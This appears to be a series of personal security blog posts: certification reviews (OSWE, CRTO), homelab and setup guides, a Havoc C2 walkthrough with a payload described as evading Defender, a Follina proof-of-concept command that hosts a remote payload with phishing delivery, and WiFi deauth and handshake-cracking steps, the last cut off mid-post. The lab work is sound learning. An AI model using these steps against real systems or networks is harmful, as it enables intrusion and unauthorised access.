The OSWE labs also feature a set of "extra mile" challenges, which are designed to push candidates even further beyond the guided exercises. These challenges require a deeper understanding of the underlying web technologies and an ability to think outside the box to identify and exploit vulnerabilities. The extra mile challenges are not guided and there is no walk-through available, which means that the candidate must use all the knowledge and skills they have acquired to complete these challenges. These extra-mile challenges were particularly satisfying to complete, as they required me to apply what I had learned in a more creative and unguided manner.

Unguided Labs

One of the unique features of the OSWE course is the unguided labs, which test the techniques taught in the course without any walkthrough or guidance. (Similar to how we'd use Proving Grounds or HTB for the PWK) These labs are designed to simulate real-world scenarios where the attacker has to identify and exploit vulnerabilities on their own. I found these labs to be particularly challenging(ish), as they required a lot of independent research and experimentation to complete successfully. However, they were also very rewarding, as they helped me develop my problem-solving and critical-thinking skills.

The unguided labs forced me to think creatively and come up with unique solutions to exploit the vulnerabilities, which helped me gain a deeper understanding of web application security.

Community

Community support was a critical component of my preparation for the OSWE exam. I found the OSWE Discord channel and the internal forums to be excellent resources for asking questions, getting feedback on my approaches, and learning from other student's experiences. If you run into an "unsolvable" issue, there's probably someone who has been there and gotten over the hurdle.

The student admins were also fairly active on the discord channel and provided valuable insights and guidance throughout the course to students who were facing issues.

Additionally, I found the various online blogs written by individuals (like this one) to be helpful resources for some initial guidance.

Note-taking

(Notion is the only right answer)

Note-taking was a critical component of my preparation for the exam. During the course, I made sure to take detailed notes on every technique and attack vector covered in the lectures and labs. I found that by taking notes, I was better able to internalize the material and retain the information. Additionally, note-taking allowed me to keep track of the various tools and commands used in each attack vector, which made it easier to reference them later.

During the exam, having detailed notes allowed me to quickly look up anything I needed, saving me precious time and allowing me to focus on the task at hand.

The Exam

Background

The OSWE exam is a 48-hour practical exam focused on web application security. It is conducted remotely, and candidates are given access to a virtual network containing multiple vulnerable web applications. The goal of the exam is to identify and exploit vulnerabilities in these applications to gain access to sensitive information or perform unauthorized actions.

The exam is hands-on, meaning that candidates must demonstrate their ability to identify, exploit, and document vulnerabilities in a practical setting. The exam is graded based on the number and severity of vulnerabilities found, as well as the quality of the documentation provided. To pass the exam, a candidate must score at least 85 points out of 100.

Remote Proctoring

Candidates are closely monitored by a proctor to ensure the integrity of the exam. The proctoring process is conducted via webcam and screen-sharing software, which allows the proctor to observe the candidate's actions and ensure that they are not using any unauthorized resources or receiving outside assistance. Although the idea of being closely monitored can be intimidating, I found the proctoring process to be quite professional and unobtrusive. Candidates are allowed to plug headphones in as long as its only connected to the host device that's involved in the exam. (Didn't know this previously lol)

As always you're allowed to take short breaks & logoff for naps. However, you're given 2 options if you decide to log off. You could leave your computer on and untouched or disconnect from the VPN. But this will cause you to lose connection to the infra and the VPN connection would be paused. Thus, I decided to leave my computer on and run some of my scripts for testing.

I'm sorry to the proctor that had to sit through me bopping my head and "rapping".

The Actual Exam

During the exam, I was able to fully exploit both the given machines and complete all the required objectives. It was a very humbling experience to see how far I had come from my initial dabbling in web exploitation. I was especially grateful for the unguided lab machines and the extra-mile exercises.

Debugging

debugging is an important aspect of the OSWE exam. During the exam, you will encounter various challenges that require you to write your own exploits. It's essential to have a solid understanding of how the exploit works and what it does. If something isn't working correctly, debugging is the process of finding out what's wrong and fixing it.

This can involve looking at the source code of the exploit, understanding how the target application works, and using various debugging tools to pinpoint the issue. In some cases, you may need to use trial and error to identify the problem. The ability to debug effectively can make all the difference in the success or failure of an exploit. It's crucial to practice this skill during your preparation so that you are comfortable with it on exam day(utilize the lab!!).

Methodology

During the exam, I followed a methodology that prioritized understanding the web application and its functionalities over just looking for individual vulnerabilities. This approach helped me to chain together multiple attack vectors and achieve full exploitation of the given machines. I first performed a thorough reconnaissance to identify all possible entry points and attack surfaces. Then, I used manual testing techniques to identify potential vulnerabilities and attack vectors.

Once I identified potential attack vectors, I focused on understanding the application logic and how I could chain together different vulnerabilities to achieve my objectives. I found that by taking this approach, I was able to maximize my exploitation potential and fully demonstrate my understanding of the web application. Starting my analysis from unauthenticated portions of the web application always seems to reward me the most (as expected).

This methodology was extremely effective during the exam (at least for me!).

Deliverables

The OSWE exam requires the candidate to submit two deliverables (in one document) within 24 hours of completing the exam. The first deliverable is a detailed report of the exploitation process, including steps taken, tools used, and vulnerabilities exploited (with vulnerable code snippets and explanations). The report must also include a description of the custom scripts or tools developed during the process. The second deliverable is the 0-click exploit script which is able to automate the exploitation of all discovered vulnerabilities.

The report and script are both reviewed by the OffSec team, and the candidate must demonstrate a clear understanding of the exploitation process and the vulnerabilities exploited. The deliverables are an important part of the OSWE exam, as they allow the candidate to showcase their skills and provide evidence of their abilities.

Templated snippets

While you go through the course, you'll have created and improved your custom exploit scripts. Please template these and safe keep them. It's gonna be extremely helpful in the exam when you need to not only find and exploit the vulnerabilities but create a script to automate them. Read up and practice using requests, WebSockets (made me contemplate life decisions in the lab) and other web-related libraries.

Support

The exam support team was always available to answer any questions or concerns I had. Whenever I encountered any technical issues or needed clarification on the exam instructions, they were quick to respond and provide assistance. Their prompt and professional responses helped me to focus on the exam itself without any added stress or anxiety. ASK IF UNSURE!!

Issues I faced

(more like issues that faced me but ok)

As always, not everything was rainbows and sunshine. While going through the AWAE course, I faced a few challenges that tested my perseverance. From grappling with complex web application vulnerabilities to struggling with the NEW Offsec Learning Portal, I encountered various hurdles along the way.

The New Portal (LMS)

Offsec recently released a new portal to replace its old portal which could only be accessed via their VPN. The platform itself is pretty flash, clean and pleasing to the eye. The issues I faced during my lab time were all reliability related.

The portal was extremely unstable. It kept going down without prior notice which affected a ton of fellow students. There were multiple instances where I would set aside precious time away from work and uni just to get hit with the "Unannounced Outage".

Offsec did give out lab extensions to students on a case-by-case basis. However, the extension was pretty invaluable to me as I was already on the learn one package. I was only left with frustration and disappointment ☹️.

But I don't entirely blame them as their support team was pretty responsive and transparent. They were facing such instability due to the new PEN200 labs and having students migrated to the new infrastructure. Hope future students wouldn't have to go through what I did!

Deliverables

I found it odd that candidates are expected to attach the exploit script in the report document that is due for submission. I was extremely paranoid and kept pasting my exploit script multiple times into the report document before converting it to the preferred .pdf format.

I'm sure they have a valid reason for this. (Don't want students possibly submitting malicious files. Do let me know if you know of other reasons). But I do believe something else can be done about this situation to prevent paranoia amongst students.

Conclusion

Undoubtedly, the OSWE certification journey was a demanding one, but the knowledge gained and the skills developed throughout the process made it all worthwhile. The course and lab materials provided by Offensive Security were extensive and well-structured, allowing me to develop a deeper understanding of web application security and hone my skills in exploiting web vulnerabilities.

The exam itself was a true test of my abilities and required me to think outside of the box to fully exploit the given machines. I am proud to have earned the OSWE certification and look forward to applying my knowledge and skills in future engagements. Thank you to everyone who's helped me through this journey😁! Hope this help's someone out there who's looking to embark on this journey. Do not hesitate to reach out to me Nee#0110!

Red Team Ops is a course that teaches the basic principles, tools and techniques, that are synonymous with red teaming. Students will first cover the core concepts of adversary simulation, command & control, and how to plan an engagement. They will then learn about each stage of the attack lifecycle from initial compromise to full domain takeover, data hunting, and data exfiltration.

Background

I enrolled into Zero-Point Security's Red Team Operator course about 2 months and cleared the exam with 8/8 flags on the 13th of October. Throughout the year, I've been experimenting and playing around with Active Directory Exploitation and Opensource C2 Frameworks in my lab.

Both Zero-Point's CRTO and Pentester Academy's CRTP have been on my radar for a while now. Looking into the outline of these courses, I realized that RTO focuses more on the entire attack lifecycle from the initial compromise to full domain take over. That was what pushed me over the fence to pursue this course.

The Course

The course alone costs £365.00. There is also an option which gets you 40 hours of lab time with the course which costs £399.00. Zero Point Security also recently added an option which allows students to split the payment up into 4 smaller payments.

Course Content

The course contains 27 comprehensive chapters. Each chapter goes in-depth with well documented explanations, commands and screenshots to back them up. The content was fairly easy to absorb given that I was actively trying the TTPs in the course lab which I'll talk about in the next section.

Whenever I felt lost with any of the chapters, there were a fleet of videos which I could refer to that demoed the attacks taught in the course. However, I do have to preface this by saying that not all chapters and sections have their own video. I heavily enjoyed the red teaming techniques & concepts that this course brought across. Here are some of my favorite sections this course had to offer.

OPSEC

One thing I really appreciated was that the course didn't just teach you how to throw tools and techniques at the target. It placed emphasize on performing attacks with opsec in mind which I haven't seen before. Educates you on what a red teamer has to have in mind when conducting engagements.

Initial Compromise

I've gone through a number of Initial Access modules of other organizations. However, what stood out to me in RTO was that the course teaches you how you can build a detection system with the help of Kibana. This was my first time doing that and noticing what the blue teamers actually see.

Active Directory Exploitation

This Course taught quite a number of AD Attacks. From credential/User impersonation to Kerberos attacks to Domain Dominance Techniques & Persistence, this course covered it all. The learning was also extremely hands on. I was able to execute each, and every attack taught in the course, in the lab.

Cobalt Strike

Prior to this I've heard some great things about Cobalt Strike, but I've only ever used Free & Opensource ones. Although this course teaches Session Passing in between C2s, it uses Cobalt Strike as its primary C2. The course also provides you with a valid copy of Cobalt Strike to play around in the lab with no extra charges on top of your lab cost. I've also been wanting to learn Cobalt for a while now. This course killed 2 birds with one stone :)

Bypassing Antivirus

The course also covers some basics of bypassing an active antivirus on a target host. This chapter ties in well with the use of cobalt strike to generate payloads and using them in action. Students will not be able to bypass an up-to-date AV as this is just an intro to the topic. However, the concept taught is still extremely valid. If you're interested in dealing with EDRs, check out CRTO II.

Course Lab

I was very contempt with what I got for the price I had paid. The lab consists of a couple Windows hosts in a few AD Forests. As you go along with the course, you'll pick up techniques to own all Forests.

Backend

As someone who runs their own home lab, I'm naturally someone who's extremely interested in infra. I was impressed on how Zero-Point Security had set the lab up. The lab is deployed on AWS with the help of Snap Labs. Students are required to create a snaplabs account to redeem the lab.

There's also an admin box which runs Apache's Guacamole (same solution that I use 😄) to facilitate the remote desktop connection via a web browser. Yeap, you can only access the labs via the web RDP. I was initially pretty upset with this as the latency was extremely bad (I'm based in SG). However, I learnt that this was a requirement to have a valid copy of Cobalt Strike for us to play around with in the lab.

Content

The machines and setup of the lab were more than enough to learn and practice the TTPs taught throughout the course. I didn't find anything lacking and there were sufficient hosts, forests to conduct tests on.

I was given 40 hours of lab time with the default package. I ended up using about 35.5 hours for my practice. However, if you require more lab time you are able to purchase it here for £1.25 a month.

Support

Support is provided thru 3 main channels.

• Rasta himself via support mail & Discord

• Active community on discord

• Community forums on the LMS

  

The community is extremely helpful in most of the cases. The discord server also acts as an archive of all issues other students have faced. It has helped me countless times and couldn't be more thankful for it!

The Exam

The CRTO Certification exam is a 48 hour-long practical engagement which sets out to simulate a realistic red team engagement which tests students on adversary simulation, command & control, engagement planning and time management. Students are required to collect 6 out of the 8 flags in the environment to pass the exam.

The exam absolutely picks your brain on all the content that was taught through the course. It's not a direct paste of the course lab and requires you to think out of the box and chain multiple TTPs in order to gain access to the machines. The exam's 40 hours can be spread over 4 days. This is to give u ample time to relax, refresh and get some quality sleep.

My Exam Experience

My personal experience with the exam was mostly positive! I used up about 32 out of the 48 hours for the exam. I was able to rake up 6 flags to secure the pass in about 6 hours. However, I hit a mental block after that. I tried various methods and followed false leads to get the last 2 flags. But nothing was working. After taking a mini break I was able to secure the 7th flag 4 hours after the 6th.

The last flag however, had me going crazy. I was trying all sorts of attacks to get to it. At a point I even started thinking if there was a technical issue and reached out to the creator who confirmed that there were no such issues. There was a point in the exam where I started throwing ZeroLogon at the DCs 😅. I ended up logging off for the night, went to work the next day, had dinner with friends and restarted the exam environment the following night. After about a good 7 hours and trying almost all attacks, something struck me, and I got to the final flag. Was a solid journey IMO! Worth the pain.

Improvements

Overall, I'm really happy with what I got from this course. I learn a ton and it didn't break the bank. Rasta also recently upgraded the cobalt strike deployed in the lab to the latest version and reworked some of the sections which includes new screenshots and demo videos!

The only suggestion I have is to expand the AWS region. Let the students choose the region closest to them to enable the best learning experience! Other than that, that's it from me! Highly recommended course 😁

I'm gona deploying this into my infra and playing around with it in this post! Been wanting to test out the Sleep Obfuscation implementation on the Demon for a while now.

Sidenote: You'll notice a lot of similarities between Havoc and Cobalt Strike and that's not necessarily a downside IMO!

Prerequisites

• Debian-Based Host (C2 Server)

• Debian-Based Host (C2 Client)

• Target Host (Windows 7/10/11)

Setup & Installation

(C2 Server)

Installation

Prerequisites Packages

┌──(nee㉿4pfsec)-[~] 
└─$ sudo apt install -y git build-essential apt-utils cmake libfontconfig1 libglu1-mesa-dev libgtest-dev libspdlog-dev libboost-all-dev libncurses5-dev libgdbm-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev libbz2-dev mesa-common-dev qtbase5-dev qtchooser qt5-qmake qtbase5-dev-tools libqt5websockets5 libqt5websockets5-dev qtdeclarative5-dev golang-go qtbase5-dev libqt5websockets5-dev libspdlog-dev python3-dev libboost-all-dev mingw-w64 nasm

Setting up the bookworm repo for Python 3.10.

┌──(nee㉿4pfsec)-[~] 
└─$ echo 'deb http://ftp.de.debian.org/debian bookworm main' >> /etc/apt/sources.list sudo apt update sudo apt install python3-dev python3.10-dev libpython3.10 libpython3.10-dev python3.10

Setup

Git Clone

┌──(nee㉿4pfsec)-[~] 
└─$ git clone https://github.com/HavocFramework/Havoc.git

Building the Client

cd Havoc/Client mkdir Build cd Build cmake .. cd .. ./Install.sh

Building the Teamserver

cd Havoc/Teamserver go mod download golang.org/x/sys
go mod download github.com/ugorji/go

┌──(nee㉿4pfsec)-[~/Havoc/Teamserver] └─$ ./teamserver

With that, Havoc is installed and ready to go!

Havoc Framework

The C2 consists of 2 main parts. The client and the team server. Let's start off with the Teamserver.

Teamserver

The teamserver allows us to specify a profile or use the default one. The profile allows us to edit configs of the following domains:

• Teamserver

• Operator

• Listener

• Service

• Payload

The default profile is located at Havoc/Teamserver/profiles

Running the teamserver with a profile

┌──(nee㉿4pfsec)-[~/Havoc/Teamserver] 
└─$ ./teamserver server --profile profiles/havoc.yaotl

Client

Running the Client

┌──(kali㉿kali)-[~] 
└─$ Havoc/Client/Havoc

Connecting to the teamserver

• Name

• C2 Host

• C2 port

• C2 User:Password

And we're in! The Dracula theme on the client looks really good. Let's check out some of the functionalities!

Configuring Listeners

View->Listeners->Add

Let's configure our listener and point the host to c2.4pfsec.com. This is the domain proxied through Cloudflare.

Generating Payload (UNDETECTED BY Windows Defender)

As of writing, the payload is not detected by Microsoft Defender. (05/10/22)

Attack->Payload->Generate

Callback to C2 (UNDETECTED BY Windows Defender)

As of writing, the callback method is not picked up by Microsoft Defender. (05/10/22)

Now that we have our payload, lets deliver and execute it. [You're free to use any delivery method]

I simply hosted an SMB share and transferred the payload to the target. As shown in the demo below, I was able to get a call back from a fully patched Windows 11 Pro Machine using the generated payload.

Interacting with Target

There's a whole list of commands that you're able to run on the target once it calls back to your C2. The target will fetch the C2 for jobs based on the given sleep duration during payload generation.

shell

You're able to run shell commands directly on the target with the help of Havoc

\>>> shell [command]

Screenshot

The screenshot command takes a snapshot of the target's desktop and send it back to the C2.

\>>> screenshot

Seen on Host

Seen on C2

These were just some of Post exploitation offered by Havoc.

Havoc looks to have great potential and I hope to continue this series by exploring the C2 in-depth real soon!

Remotely monitoring my server's temperature and controlling the fan speed accordingly has been one of the more frustrating things I had to do. But that ends today! (Kind of...) Here's how I solved that issue with Python Flask and ipmitool.

[

GitHub - ItsNee/Dell-PowerEdge-R710-Fan-Controller-API: A Simple API made with Python Flask to help manage fam speeds on the Dell PowerEdge R710 Enterprise Server

A Simple API made with Python Flask to help manage fam speeds on the Dell PowerEdge R710 Enterprise Server - GitHub - ItsNee/Dell-PowerEdge-R710-Fan-Controller-API: A Simple API made with Python Fl...

GitHubItsNee

](https://github.com/ItsNee/Dell-PowerEdge-R710-Fan-Controller-API.git)

Prerequisites

• A system in the same network as the server installed with Python 3(This could very well be the server itself or a virtual machine running on the server. Baseline: machine should be able to reach server without any network issues)
• Dell Server with IDRAC and IPMI over LAN turned on

Solution to Issue

With the help of IPMI (Intelligent Platform Management Interface) over LAN, we would be able to query power supply usage, fan speed, server health, security details, and the state of operating systems. However, I'd be using this to query the server's temperature and change the fan speed.

One small hurdle is that we have to have a machine in the same network as the server (unless you want to expose your IPMI to the WWW). This bump can be overcome with the help of a custom made API exposed out to the internet through a reverse proxy. However its highly recommended that you obscure your API endpoint to prevent malicious actors from playing around with it. This can cause some serious damage to the hardware.

[

GitHub - ItsNee/Dell-PowerEdge-R710-Fan-Controller-API: A Simple API made with Python Flask to help manage fam speeds on the Dell PowerEdge R710 Enterprise Server

A Simple API made with Python Flask to help manage fam speeds on the Dell PowerEdge R710 Enterprise Server - GitHub - ItsNee/Dell-PowerEdge-R710-Fan-Controller-API: A Simple API made with Python Fl...

GitHubItsNee

](https://github.com/ItsNee/Dell-PowerEdge-R710-Fan-Controller-API.git)

Here's the simple Python Flask API Server that I wrote. It performs 2 simple but crucial tasks.

• Get Current Server Temperature
• Set Server Fan Speed

Setup

Installing ipmitool

The Flask application entirely depends on the system having the ipmitool utility. Let's go ahead and install that first

apt-get install ipmitool -y

Installing Python3 and pip

apt-get install python3 python3-pip -y

Clone Repository

git clone https://github.com/ItsNee/Dell-PowerEdge-R710-Fan-Controller-API.git

Installing Requirements

pip3 install -r requirements.txt

Run Server

Foreground

python3 api-server.py

Background

Here's how to background the API Server.

nohup python3 api-server.py&

Here's how to kill a background process:

Find the ProcessID

ps -faux | grep api-server

Kill Process

kill -9 1085872

API Usage

https://api.myserver.com/ = [Returns a welcome string]

https://api.myserver.com/get-temperature = [Returns the server's temperature]

https://api.myserver.com/set-fan-speed/ = [ variable can be adjusted by end user]

IFTTT

IFTTT is a free application that I make use of in order to send web requests with a tap of a widget on my phone's home screen.

Creating an applet is as easy as picking "this" and "that". In my case, I went with "If button push, send web request"

And with that, I'm able to remotely change my server's Fan Speed with a push of a button from my phone's home screen!

CVE-2022-30190 AKA Folina, is a zero-day found in Microsoft Products that allows a remote attacker to run malicious code on the endpoint. This vulnerability exists in the Windows Support Diagnostic Tool and can be exploited with any application that supports the invoking of URL protocol.

I however, will be specifically taking a look at exploiting this with the help of MS Office files as phishing is the most common way that attackers try to get into the system. I have also put together a mini proof of concept that makes testing this in your environment way easier! Let's setup an environment and take a look at how the exploit works in detail.

A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.
-Microsoft Security Response Center

[

GitHub - ItsNee/Folina-CVE-2022-30190-POC

Contribute to ItsNee/Folina-CVE-2022-30190-POC development by creating an account on GitHub.

GitHubItsNee

](https://github.com/ItsNee/Folina-CVE-2022-30190-POC)

How It Works

It all begins with the malicious word document. All office documents are basically packed files. anyone can unpack then with the unzip command.

Doing so reveals files that are contained within a word document. The specific file in question here is word/_rels/document.xml.rels.

document.xml.rels is an XML file that maps relationships within the document (image holders/tables/fonts) to external resources (images hosted online/videos). The exploit makes use of this functionality.

The attacker first unpacks a word document as shown in the previous step, modifies the target to point to his web server hosting the malicious payload as shown above and repacks the word file.

Shown above is the payload hosted on a remote server. Initially researchers found out that the MSTD tool requires a pin to run any code and therefore people thought this exploit would not be possible. However a researcher found out that given that the payload hosted on the remote server be more than 4096 bytes, MSTD will continue to run arbitrary code giving any attacker Remote Code Execution. Another researcher by the name of Bill Demirkapi has written an in-depth piece explaining how and why the number 4096. Now that we have taken a look at how the exploit works, let's see it in action!

Lab Setup

Prerequisites

• Windows 10/11 virtual machine
• Office Deployment Tool (download and install it on the VM)

Installing Office 2021 Enterprise

C:\Users\User>setup.exe /configure configuration-Office2021Enterprise.xml

That's all for the setup!

Exploitation

[

GitHub - ItsNee/Folina-CVE-2022-30190-POC

Contribute to ItsNee/Folina-CVE-2022-30190-POC development by creating an account on GitHub.

GitHubItsNee

](https://github.com/ItsNee/Folina-CVE-2022-30190-POC)

To make things easier, I wrote up a proof-of-concept in regards to this vulnerability. Here's how it works:

Clone the POC

git clone https://github.com/ItsNee/Folina-CVE-2022-30190-POC.git cd Folina-CVE-2022-30190-POC

Run Exploit

python3 folina.py --payload-url "http://192.168.200.144:1337/pwn.html"

Running this will create a malicious word document with the given --payload-url parameter and host the default payload on port 1337 on all interfaces of the machine that the tool is run on.

Deliver Malicious File

Deliver the malicious word document created by the script to your end point. From the attackers POV this could be via a phishing email of some sort.

Execute File

Once the user the user executes the file, your web server hosting the payload will receive all a callback and the calculator application will remotely be opened on the endpoint without any other action.

Video Demo

Mitigation

Microsoft and some other security researchers have released some workarounds that have shown to work against this exploit.

• Disable the MSDT URL Protocol

On top of all this, Microsoft Defender has also started to detect and protect against this actively. There might still be bypasses out in the wild! beware. Disable the MSDT URL if you can afford it!

Hope you found this insightful!!

I've always wanted to set something like this so that I could safely have all of my accounts and cookies on a browser that I could trust and not sacrifice privacy.

Most of the time the endpoint given to any person by any entity would have some sort of monitoring and end point security solution. This might not allow the user to login to their personal accounts on the native browser keeping privacy in mind. Let's work towards fixing that with this :)

This is how the end solution would look like! Basically accessing a browser via another browser.

Prerequisites

• Some sort of server (Preferably Linux)
• Docker & Docker-Compose Installed

If you're having trouble installing docker-compose, do check out my post on docker!

Spinning up the container

This step is pretty straight forward after you got docker and docker-compose installed.

In your preferred directory, create the following files and folders. (Ignore the .d and .sh files. That will be created by the container)

Next, open the docker-compose.yml file and enter the following contents. Feel free to change my docker compose file to your liking!

version: '3.3' services: firefox: container_name: firefox ports:

• '5800:5800' volumes:
• '/firefox/firefox:/config:rw' image: jlesage/firefox shm_size: "2gb" restart: unless-stopped

Once completed, run the following command to spin up the container :)

root@ubuntusvr1:~/firefox# docker-compose up -d

Once everything completes with no errors, browser your IP on port 5800 and you should see the Firefox session up and running as shown below! 😀

Authentication

You can even go a step further and add proxy authentication if you're exposing this out to the open web as shown below!

My time has finally come. After all those years of wanting a personal home lab setup which doesn't run on Pi4, I finally got my hands on a Dell PowerEdge R710 and some other Cisco gear.

Hardware & Specifications

Router

• Nokia Beacon
• Cisco 1941 Series

Access Point

• Nokia Beacon Wifi
• CISCO Aironet 1250 Series

Switch

• Linksys LGS108 8-Port Business Desktop Gigabit Switch
• Cisco Catalyst 3750 v2 Series PoE-24

Server

• Dell PowerEdge R710
  CPU
  - 2 x Intel Xeon E5530
  RAM
  - 64GB ECC RAM [config = 8 x 8gb sticks]
  Storage
  - 6 x 600gb SAS drives
  Extras
  - Perc 6i RAID Controller
  - iDrac remote management

Network Topology

The next thing on the list was to plan my network topology. I had to ensure that I had the optimal setup which did not disrupt the main network. Afterall, network stability is crucial during these work-from-home times.

This was the final topology that I went with. This topology ensured that I had control of the machines that would possibly by internet facing with the help of the pfSense Firewall. The network also ensured that none of my other devices would be affected if the server were to face downtime. (i.e. NAS, Access Point, Desktops)

Hypervisor

I spent a good couple of days battling this choice out. I've been team VMware for the past 5 years. Out of those 5 years I've had a year of beginner experience with ESXI. However upon doing some research, I realized that a ton of homelab enthusiasts use Proxmox.

After looking through a ton of blog posts and weighing out my preferences, I ended up going with VMware ESXI 6.5.0 Update 3 (Build 13932383). Here are a few awesome resources that might help you decide which ones best for you!

[

Proxmox vs ESXi | Choosing the Best Hypervisor | ServerWatch

Proxmox and ESXi are hypervisor software that creates multiple virtual machines. Explore the performance & price of these hypervisors now.

ServerWatchSam Ingalls

](https://www.serverwatch.com/reviews/proxmox-vs-esxi/)

Proxmox vs. ESXi from homelab

Operating System & Services

Now it was time for me to pick the OS I wanted my virtual machines to run. My initial plan was to go with something new but I had a couple years of experience with Debian-based distros. Thus, I ended up going with Ubuntu 20.04.3 for all my Linux Servers.

As for services, I had a couple of things I wanted to run.

• Cloud
• Video Streaming Server
• Music Streaming Server
• Self-hosted Pastebin
• Web Hosting Server
  - Personal Site
  - Personal Blog
  - Public Sites
• Qbittorrent Server

These were just some of the things I had in mind at the start! We'll see how it goes in the next few posts

Conclusion

Now that I have the basics down, I'll be spending my free time upgrading/installing/configuring/exposing the servers and services! I'll be writing about my homelab process :) Can't wait to see how it'll go! Seeya in the next post 👋

Here's how you can deploy kali on AWS for free under the free tier (for a year). as long as you stay under the usage guidelines. I did this so I could have a quick and dirty VM I can make use of when I'm not at my desk! Lezgo!

Prerequisites

• Free verified AWS account

Deployment

Head to the AWS Management Console and search for EC2. EC2 is amazon's version of a VPS.

Once there, hit Launch Instance on the dashboard as shown below.

Next hit AWS Marketplace. This would show us a list of "ready to deploy" VMs that we can choose from.

Then, search for kali and hit select. Make sure you select the option that says Free tier eligible.

Once selected and verified, hit continue.

At the Instance Type page, make sure to choose t2.micro which lets us use the free tier.

[OPTIONAL] Configure the Security Group to your liking. I'm adding a rule to allow all traffic as this machine will be behind a proxy for my use case.

Type - All traffic => any traffic flow in or out of the VM Protocol - All => Any kind of traffic going to or coming from the VM Port Range - 0-65535 => Allow all ports Source - 0.0.0.0/0 => Rules with source of 0.0.0.0/0 allow all IP addresses to access your instance

Once configured, hit Review and launch. AWS will require you to create a new ssh key pair to deploy the machine. Once created, remember to download the keypair before proceeding.

Once the Instance State turns to Running we are all set!

To verify that the system is up and running lets SSH into it.

ssh user@host -i cloudKali.pem

All good! we now have a kali Linux on the cloud for absolutely free!

VM Configuration

A GUI would definitely be better than a CLI for the use case! Let's go ahead and set up a desktop environment together with VNC so we can access this over the web or even a VNC viewer later on.

Let's go ahead and install XFCE and the VNC server.

┌──(kali㉿kali)-[~] └─$ sudo apt-get install xfce4 xfce4-goodies tightvncserver -y

Once that's completed, let's install the desktop base.

┌──(kali㉿kali)-[~] └─$ sudo apt-get install gnome-core kali-defaults kali-root-login desktop-base -y

When prompted to configure gdm3, pick lightdm as the default display manager as shown below. As the name suggests, this is gonna be lighter on our system.

Now that that's done, let's configure the tightvncserver.

┌──(kali㉿kali)-[~] └─$ tightvncserver

That's it. We're done configuring VNC and the GUI Desktop. Go ahead and onboard this VM to your favorite VNC viewers. I'll be onboarding it to my web-based VNC client that I have deployed on a proxy server. Once onboarded, you should be able to connect to the instance without any issues!

On PC

On Mobile

Pretty cool! Hope this helps someone out there :)

I recently ran into an issue where I wasn't able to virtualize a copy of windows 11 on VMware. Here's how I got around that and managed to run a windows 11 pro VM on VMware.

Here's what It'd look like when you try to install windows 11 on VMware as always. This is due to the lack of TPM 2.0 and Secure Boot and here's how we can overcome this during virtualization.

Prerequisites

• Vmware Workstation Pro (I'll personally have not tested it on other platforms)
• Windows 11 ISO file

Installation

Create a new virtual machine with the wizard (Typical) as you would always do.

Once the virtual machine is created, edit the virtual machine settings and change the following options as shown.

Enable the Virtualize Intel VT-x/EPT or AMD-V/RVI under the Virtualization engine.

Then, head to options > Advanced and enable Secure boot under Firmware Type

Lastly, we need to edit the .vmx file which makes up the VM.

Head to the VM directory as shown above and add the following line as shown below.

managedvm.autoAddVTPM="software"

Once done, boot the virtual machine as per normal and follow through with the usual Windows installation.

Once u see the screen shown below, you're in the clear! You will be able to install windows without any issues and virtualize it all you want!

Juz more proof

And once everything installs, you should see the setup page as shown below!

😊 Hope this helped someone out there struggling with this issue! 💯

WOL is a pretty neat feature that allows a user to boot a pc via another server/system on the same network. For my use case, this helps me save electricity whenever I don't need my system to be running. My Windows 10 setup stopped functioning after the upgrade to Windows 11. Here's how I got it working once again after the upgrade.

Prerequisites

• Ensure that the motherboard supports WOL and the feature is enabled in bios
• A system with Windows 10/11

WOL Setup

To set up WOL, we need to first identify the ethernet adapter we want to use for WOL on the system. Hit Windows + R , enter the following command and hit enter.

ncpa.cpl

Next, locate your Ethernet adapter and head to the properties.

Hit configure once the ethernet properties window pops up.

After a new window pops up, head to the advanced tab and set Wake on Magic Packet's value to Enabled.

Next, we need to change some power management settings for the feature to work well. I missed out on a step during this step which cost me a couple of hours ☹️. Hit Windows + R , type the following command and hit Enter.

powercfg. cpl

Then, select Change Plan Settings for whichever plan you are currently using and hit Change advanced power settings.

Head down to the PCI Express option and set it to Off as shown below.

Once that's done, head back to power options and select Choose what the power buttons do , hit Change settings that are currently unavailable and uncheck Turn on fast startup.

Save changes and the system's all good to go! All that's left is to use another machine in the same local network and send a WOL magic packet to the router while specifying the MAC address of the windows machine's network adapter.

Hope you didn't waste hours figuring this out 😄!

Wifi Penetration testing was always something I wanted to pick up. I recently got my hands on the hardware for it thanks to a mentor of mine which enabled me to perform a range of wireless attacks in my home lab environment! If you're interested in setting up your own Wifi Pineapple, check out my in-depth guide over on my repo site!

Capturing Wireless Handshake

Like every other penetration test, this starts with recon too! The first step to the attack would be to identify our "target". In this case, I will be attacking my own network.

Recon

Like every other penetration test, this starts with recon too! The first step to the attack would be to identify our "target". In this case, I will be attacking my own network.

Scanning

• Access the Recon Tab

• Setup Scan Settings and Run Scan

• Running Scan

Targetting

Once the scan is left to run for a short period of time, multiple targets should start popping up (As seen below). All these networks are the ones that are in the range of the Wifi 🍍.

Target Network

Here's my network which I'm gonna be attacking! (shown below)

It's evident that one client is currently authenticated with the network. The MAC address of the client is shown right below the router's MAC.

Attacking

Now that we have our target and have verified that there are clients connected to it, we can conduct a deauth attack on the network and listen for handshakes destined to the network. Deauthenticating clients from a network will force them to reconnect to it. While the reconnection is happening, we would be able to sniff and capture the handshake which we can then use to crack :)

Launching Attack

Hit the dropdown on the security tab

Hit Start Capture

Hit Deauth

Successful Capture of handshake

At this point, we have obtained a capture of the handshake which can then be used to crack the Pre-Shared Key (PSK) of the network with a trusty wordlist.

Live Attack (On client)

This is what the client would witness when the attack is underway. Most of the time we wouldn't even notice this happening when we are out and about, going through our regular day.

Mobile

Desktop

Cracking WPA2 Handshake

This section will cover how to crack WPA2 handshakes captured with the previously showcased attack vector

Cracking

We need to convert the captured .pcap file into .hccapx format in order to start cracking with it. There's a tool named cap2hccapx which can help us do this. However, we first need to download and compile it on our unix system.

Compiling cap2hccapx

Downloading Source

wget https://raw.githubusercontent.com/hashcat/hashcat-utils/master/src/cap2hccapx.c

Compiling Tool

gcc -o cap2hccapx cap2hccapx.c

Testing Tool

./cap2hccapx

Converting

Now that we have the tool compiled and ready to go, we can convert the file and prep it for cracking!

cap2hccapx E4-6F-13-FA-AD-E0_partial.pcap capture.hccapx

Cracking with .hccapx

